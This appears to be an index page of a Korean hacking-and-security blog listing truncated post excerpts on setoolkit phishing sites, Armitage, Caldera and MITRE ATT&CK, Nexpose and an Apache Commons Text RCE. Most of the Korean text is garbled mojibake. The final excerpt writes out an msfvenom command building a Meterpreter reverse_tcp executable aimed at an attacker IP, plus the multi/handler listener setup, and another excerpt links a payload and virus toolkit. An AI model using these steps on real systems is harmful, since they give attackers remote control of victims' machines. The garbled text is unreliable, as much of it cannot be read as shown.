
ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. kali๋ฅผ ์ฌ์ฉํ๋ค ๋ณด๋ฉด ํผ์ฑ์ฌ์ดํธ๋ฅผ ๋ง๋ค๊ฑฐ๋ ํ ์คํธ ์ฉ์ผ๋ก ๊ฐ์ง ์ฌ์ดํธ๋ฅผ ๋ง๋ค์ด์ผ ํ๋ ๊ฒฝ์ฐ๊ฐ ์๋ค. ์ด๋ ์ฃผ๋ก ์ฌ์ฉํ๋ ๋๊ตฌ๊ฐ setoolkit ์ด๋ผ๋ ๋๊ตฌ์ธ๋ฐ ํผ์ฑ ์ฌ์ดํธ๋ฅผ ๋ง๋๋ ๊ฒ ๋ฟ์๋ ์คํธ๋ฉ์ผ ๋ฑ ์ฌํ๊ณตํ ๊ธฐ๋ฒ์์ ์ฌ์ฉํ๋ ๊ณต๊ฒฉ๊ธฐ๋ฒ๋ค์ด ๋ค์ํ๊ฒ ์ฌ์ฉํ ์ ์๋ค. setoolkit์ ์ฌ์ฉํ๊ธฐ ์ํด์ ๋จผ์ msfdb์ postgresql์ ์คํ ํด์ผํ๋ค. sudo service postgresql..
ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. 2023.08.18 - [Metasploit/Kali & Backtrack] - ๋ชจ์ํดํน์ ํด๋ณด์!-armitageํธ ๋ชจ์ํดํน์ ํด๋ณด์!-armitageํธ ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์ blog.z3alous.xyz ๋ช์ผ ์ ์ ์์ ๊ธ์ ์์ฑํ์๋ค. ์ด..

ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ์ฝ 1๋ฌ ์ ์ฏค toss์์ ๋ง๋ค์ด์ง ์์์ ๋ณด์๋ค. ํด๋น์์์ด๋ค. https://youtu.be/tAqgvP07RnQ ํด๋น ์์์ ๋ณด๋๋์ ์๊ฐ ๊ฐ๋์ค ๋ชจ๋ฅด๊ณ ๊ณ์ ๋ณด๊ณ ์์๋ค. ํด๋น ๋์์์ ๋์ค๋ ๋ถ๋ค์ ์ค์ ๋ก ์๋ ๋ถ๋ค์ด์ง๋ง ์ด๋ ๊ฒ ๋ณด๋ ๋๋์ฑ ๋ฉ์์ด ๋ณด์๋ค. 'ํ ์ค๋ฅผ ํดํนํ๋ ์' ๋ผ๋ ์์์ ๋ณด๊ณ ์ฌ๋ฌ๊ฐ์ง์ ํฅ๋ฏธ๋ฅผ ๊ฐ์ก๋ค. forensic์ ์ฃผ๋ก ํ๋ ๋์๋๋ฐ ์ ๋ฌด๋ฅผ ํ๋ฉด์ ์กฐ๊ธ์ฉ ์ทจ์ฝ์ ๊ณผ ๋ชจ์ํดํน..

ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ์ ๋ฒ์ ํฌ์คํ ์ caldera๋ฅผ ์ค์นํ๋ ๋ฐฉ๋ฒ์ ๋ํด ์์ฑํด๋ณด์๋ค. 2022.10.27 - [Metasploit/MiTRE ATT&CK] - MITRE ATT&CK ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด ๋์ ํ๊ธฐ 1 MITRE ATT&CK ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด ๋์ ํ๊ธฐ 1 ๋ฐ์ํ ๊ต์๋๊ป ์ฑ ์ ์ ๋ฌผ๋ฐ์ ํ ์กฐ๊ธ์ฉ ์ฝ์ด๋ณด์๋ค. MITRE ATT&CK(์ดํ ๋ง์ดํฐ)์ด๋ ๋จ์ฒด๋ ํดํน๊ด๋ จ ์ ๋ฌด ๋ฐ ..
ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ๋ช์ผ์ ์ ์ด๋ฌํ ๊ธ์ ์ฌ๋ฆฐ์ ์ด ์๋ค. 2022.11.06 - [Metasploit/Vulnerability] - Nexpose๋ฅผ ์ฌ์ฉํ๋ฉด์ ์๋ฌธ์ธ์ ? Nexpose๋ฅผ ์ฌ์ฉํ๋ฉด์ ์๋ฌธ์ธ์ ? ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์ blog.z3alous.xyz ์ด๊ฒ..
ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ์ต๊ทผ์ ์ ๋ฌด๋๋ฌธ์ ์ค์บ๋๋ฅผ ์ฌ์ฉํด์ผํ๋ ์ผ์ด ์์๋ค. ๊ธฐ์กด์ ์น์ค์บ๋ ๋ฑ์ ๋ง์ด ์ฌ์ฉํด๋ณด์์ง๋ง ์์คํ ์ค์บ๋ ๋ฐ CVE ์ค์บ๋๋ ์ ์ฌ์ฉํด๋ณด์ง ์์๋ค. ๊ทธ๋์ ์ด ์ฐธ์ ์จ๋ณด์์ผํด์ ์จ๋ณด์๋๋ฐ... ์ด 3๊ฐ๋ฅผ ์จ๋ณด์๋ค. openvas(GVM) nexpose nessus ์ด๋ ๊ฒ 3๊ฐ๋ฅผ ์ฌ์ฉํ๋๋ฐ.. nexpose๋ฅผ ์ฌ์ฉํ๋ฉด์ ๊ถ๊ธํ ์ ์ด ์๊ฒผ๋ค. ์ผ๋จ ํ๊ฒฝ์ ์๋์ ๊ฐ์ด ๊ตฌ์ฑํ์ฌ ํ ์คํธ๋ฅผ ํ์๋ค. victim..

๋ฐ์ํ ๊ต์๋๊ป ์ฑ ์ ์ ๋ฌผ๋ฐ์ ํ ์กฐ๊ธ์ฉ ์ฝ์ด๋ณด์๋ค. MITRE ATT&CK(์ดํ ๋ง์ดํฐ)์ด๋ ๋จ์ฒด๋ ํดํน๊ด๋ จ ์ ๋ฌด ๋ฐ ๊ณต๋ถ๋ฅผ ํ๋ ์ฌ๋๋ค ์ฌ์ด์์๋ ์ ๋ช ํ ๋จ์ฒด์ด๋ค. ์ ๋ณด์์ง์ ์์์ผ๋ก ํ์ฌ ์ง์์ฑ์ ์ ์งํ๋ ๋ฑ์ ๊ธฐ์ ๋ค์ ๋์ดํ๊ณ ํด๋น ๊ธฐ์ ๋ค์ ๋ํ ์ค๋ช ๋ฑ ์ฝ๊ฒ ๋งํด ํดํน์ด ์ด๋ฃจ์ด์ง๋ ์์์ ํดํน๋จ์ฒด๋ค์ ๊ณต๊ฒฉ ๊ธฐ๋ฒ ๋ฑ์ ๋ค๋ฃจ๋ ๋จ์ฒด์ด๋ค. ๊ณต์ ํํ์ด์ง๋ https://attack.mitre.org/ ์ด๋ค. ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด(์ดํ ์ฑ ์ด๋ผ๊ณ ์นญํจ)๋ ๋ง์ดํฐ์์ ์์ฑ๋์ด ์๋ ๊ธฐ์ ๋ค์ ๊ธฐ๋ฐ์ผ๋ก ํ์ฌ ์๋๋ฆฌ์ค ๊ธฐ๋ฐ์ ๋ชจ์ํ๋ จ ๋ฐ ๊ณต๊ฒฉ์ด ๊ฐ๋ฅํ Caldara์ ๋ํ์ฌ ๋ค๋ฃฌ๋ค. ํ์ฌ ํด๋ผ์ฐ๋(Cloud)์ ์ฌ์ฉ์ด ์ฆ๊ฐํจ์ ๋ฐ๋ผ ๋ง์ ํดํน ๊ณต๊ฒฉ๋ค์ด ์ผ์ด๋๊ณ ์๋ค. ์ด์ ๊ฐ์ข ์นจํด์ฌ๊ณ ๋ค์ด ์ผ์ด๋..

ํด๋น ๊ธ์ ํดํน๋ด์ฉ์ ํฌํจํ๊ณ ์์ผ๋ฉฐ, ๊ณต๋ถ์ฉ์ผ๋ก ์์ฑ๋ ๊ฒ์ ๋๋ค. ํด๋น ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน์ ์๋ํ๊ฑฐ๋ ์ทจ์ฝ์ ์ ์ ์ฉํ ๊ฒฝ์ฐ ๋ชจ๋ ํ์์ ๋ํ ์ฑ ์์ ์ ์ฉํ ์ฌ๋(์ฌ์ฉ์)์๊ฒ ์์ต๋๋ค. ์ ์ฉํ์ง๋ง์ธ์! ์ต๊ทผ์ Apache Commons Text๋ผ๋ ๋ผ์ด๋ธ๋ฌ๋ฆฌ์์ ์๊ฒฉ์ฝ๋์คํ ์ทจ์ฝ์ ์ด ๋ฐ๊ฒฌ๋์ด์ ํจ์น๊ฐ ๋์๋ค. ์ทจ์ฝ๋ฒ์ ์ commons text 1.5 ~ 1.9๋ผ๊ณ ๋ฐํ๋์๋ค. ํจ์น๋ 1.10์์ ์ด๋ฃจ์ด์ก๋ค. NVD์ ๋ด์ฉ์ ์๋ฌธ์ ํ์ธํด๋ณด๋ฉด Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpol..

์ ๋ง ์ค๋๋ง์ ๊ธ์ ์์ฑํ๋ค์!!! ์ด์ ์ ๋ง์ ๋ง ๋ธ๋ก๊ทธ๋ฅผ ์์ฑ์ ์ ์งํ๋ ๊ฒ์ ๋์ ํด๋ด์ผ๊ฒ ์ต๋๋ค. ์ ๊ฐ ์ด๋ ๊ฒ ์ค๋๋ง์ ๊ธ์ ์ฐ๋ ์ด์ ๋!!!!! ใ ฮ๋กใ ฮ๋ก ์ฑ ์๊ฐ๋ฅผ ํ๊ธฐ์ํด์์ธ๋ฐ์!! ์ฑ ์ ๋ชฉ์ 'MITRE & ATT&CK ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด' ๋ผ๋ ์ฑ ์ ๋๋ค. ์๋์๋ ์๋์ ํด๋ณด์๋ฉด ์ฌ์ค ์ฑ ์ ์์ด์ ๋ฐ์ํ ๊ต์๋๊ป ์ฑ ์ ์ ๋ฌผ ๋ฐ์์ด์! ์ ๊ฐ CERTํ์์ ๊ทผ๋ฌด๋ฅผ ํ๋ค๋ณด๋ MITRE ATT&CK ๊ด๋ จ ์ ๋ฌด๋ ์งํ์ ํ๊ณ ์๋๋ฐ ๋ง๋ ํ ์ฐธ๊ณ ํ๊ฑฐ๋ ํ ๋งํ ์ฑ ๋ค์ด ์์๊ฑฐ๋ ์? ๊ทผ๋ฐ ์ด๊ฒ ๋ญ๋??? ํ๋์์ ์ ์ ๋ง์์ ๋ค์๋์ง ๋ญ!! ์ด๋ ๊ฒ ์ข์ ์ฑ ์ ์ถํํด์ฃผ์ จ๋จ ๋ง์ด์ฃ ? ์ฑ ํ์ง๋ถํฐ ๋ญ๊ฐ ๋๋์์ง์์ต๋๊น? ์ ๋ ํ๋ณตํ์ธ์๋ผ๋ ๋จ์ด๋ฅผ ์์ฒญ ๋ฒ ๋ฆฌ๋ฒ ๋ฆฌ ์ข์ํ๋จ๋ง์ด์์? ๊ทธ๋ฐ ์ ๋ฅผ ์ํด ๋ ์ด..
Brutal โ Toolkit to quickly create various payloads,powershell and virus attacksBrutal - ๋น ๋ฅด๊ณ ๋ค์ํ payloads, ํ์์ ธ๊ณผ ๋ฐ์ด๋ฌ์ค ๊ณต๊ฒฉ์ ์ํ ํดํท https://github.com/screetsec/brutal
๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ service postgresql start ๋ช ๋ น์ด๋ฅผ ์คํ์ํจ ํ service metasploit start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ armitage๋ฅผ ์คํ์ํจ๋ค. ์ด๋ฌํ ์ฐฝ์ ๋ณผ์์์ ํ ๋ฐ connect๋ฅผ ๋๋ฅด๊ณ yes๋ฅผ ๋๋ฅด๊ณ ๊ธฐ๋ค๋ฆฌ๋ฉด ์~~ ์~~~ ๊ธฐ๋ค๋ฆฌ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋ฌ๋ค. tab์ฐฝ์์ hosts -> add hosts ๋ฅผ ๋๋ฅด๋ฉด ์ด๋ ๊ฒ victim IP๋ฅผ ์ ๋ ฅํ ์์๋๋ก ๋ฌ๋ค. ๋ฑ๋กํ OS ๋ฅผ ์์๋ณด์ ๋ค์ host ํญ์์ nmap scan -> quick scan(os detect)๋ฅผ ํด๋ฆญํ๊ณ yes ๊ทธ๋ผ ์ฝ์์ฐฝ์ ์ด๋ฌํ ๊ฒ์ ํ์ธํ ์ ์๋ค. ์ด์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ๊ณต๊ฒฉํ๊ธฐ ์ํด ์ด๋ ํ..
๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์ํ๋ ํฌํธ] -f exe > filename.exe ๊ทธ๋ผ /root ํด๋์ exeํ์ผ์ด ์๊ธด๊ฒ์ ํ์ธํ ์ ์๋ค.๊ทธ๋ผ ๋ค์์ผ๋ก๋ ์ปจํธ๋กคํ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ค์ด๋ณด์. ๋จผ์ msfconsole์ ์ ๋ ฅํ๋ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์ฐ๋ฆฌ๊ฐ ํ์ผ์ ๋ง๋ค๋ ์ฌ์ฉํ payload]set LHOST [attacker ip]set LP..